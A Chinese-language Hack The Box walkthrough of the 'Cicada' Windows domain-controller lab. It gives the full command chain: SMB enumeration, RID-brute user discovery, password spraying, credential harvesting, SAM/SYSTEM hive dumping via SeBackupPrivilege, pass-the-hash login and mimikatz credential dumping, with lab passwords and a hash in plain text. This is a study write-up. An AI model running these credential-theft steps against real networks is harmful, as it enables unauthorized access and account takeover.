本文章仅用于网络安全研究学习,请勿使用相关技术进行违法犯罪活动。
Hack The Box是一个国外的靶机在线平台,实验环境将实时更新,允许您测试您的渗透测试技能。
知识点:smb rid遍历、
kali:10.10.16.3
cicada:10.10.11.35
0001.获取系统权限
使用nmap对靶机进行扫描,根据端口开放情况可以判断是Windows,根据Host script results可以判断开启了smb。
nmap -sC -sV -O -oN nmap.txt 10.10.11.35
# Nmap 7.94SVN scan initiated Mon Sep 30 22:17:34 2024 as: nmap -sC -sV -O -oN nmap.txt 10.10.11.35
Nmap scan report for 10.10.11.35 (10.10.11.35)
Host is up (0.55s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-01 09:18:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-01T09:19:30
|_ start_date: N/A
|_clock-skew: 6h59m59s
进入smb查看是否有可用信息,密码为空,可以看到共享的文件夹列表,其中可能有用文件夹的是DEV和HR。
smbclient -L //10.10.11.35
DEV进入后没有操作权限,在HR里面发现了Notice from HR.txt文件,传输到本地后发现初始默认密码:Cicada$M6Corpb*@Lp#nZp!8
smbclient //10.10.11.35/HRdirget "Notice from HR.txt" cat Notice from HR.txt
有了初始密码,我们通过smb穷举rid收集用户名,
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute
前面几行都是系统用户,直接忽略,将后面几行结果保存到users.txt中,使用下列语句筛选用户名保存到usernames.txt中。
grep -oP '(?<=CICADA\).+(?= ()' users.txt > usernames.txt
现在我们有了用户名和密码,尝试遍历,最后在ldap遍历时确认了密码对michael.wrightson用户可用。
crackmapexec ldap cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
再使用得到的用户名密码提取用户信息,得到david.orelious用户的密码aRt$Lp#7t*VQ!3
crackmapexec ldap cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
经过尝试可以使用david.orelious用户访问smb中的dev文件夹,里面找到Backup_script.ps1文件,打开后得到emily.oscars用户的密码Q!3@Lp#M6b*7t*Vt
smbclient -U david.orelious //10.10.11.35/dev
dir
get Backup_script.ps1
cat Backup_script.ps1
使用evil-winrm远程登录,获取系统权限
evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
0002.获取Administrator用户权限
首先查看当前用户拥有的权限,当前用户有特权SeBackupPrivilege。
whoami /all
此特权向用户提供对文件系统的完全读取访问权限,例如SA文件和SYSTEM注册表文件,这两个文件可能破解系统或网络上高权限用户的密码来提权,步骤如下:
a.转存注册表到本地
reg save hklmsam c:Tempsam
reg save hklmsystem c:Tempsystem
download sam
download system
b. 解码
impacket-secretsdump -sam sam -system system local
使用得到的hash值远程登录,得到Administrator用户权限。
evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.10.11.35
上传mimikatz.exe还可以获取Administrator用户的密码,mimikatz.exe在kali中自带的有/usr/share/windows-resources/mimikatz/x64/mimikatz.exe。
upload mimikatz.exe
./mimikatz.exe "sekurlsa::logonpasswords" exit
感谢观看!
原文始发于微信公众号(Rsec):HTB靶场 Cicada(Windows)[Easy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论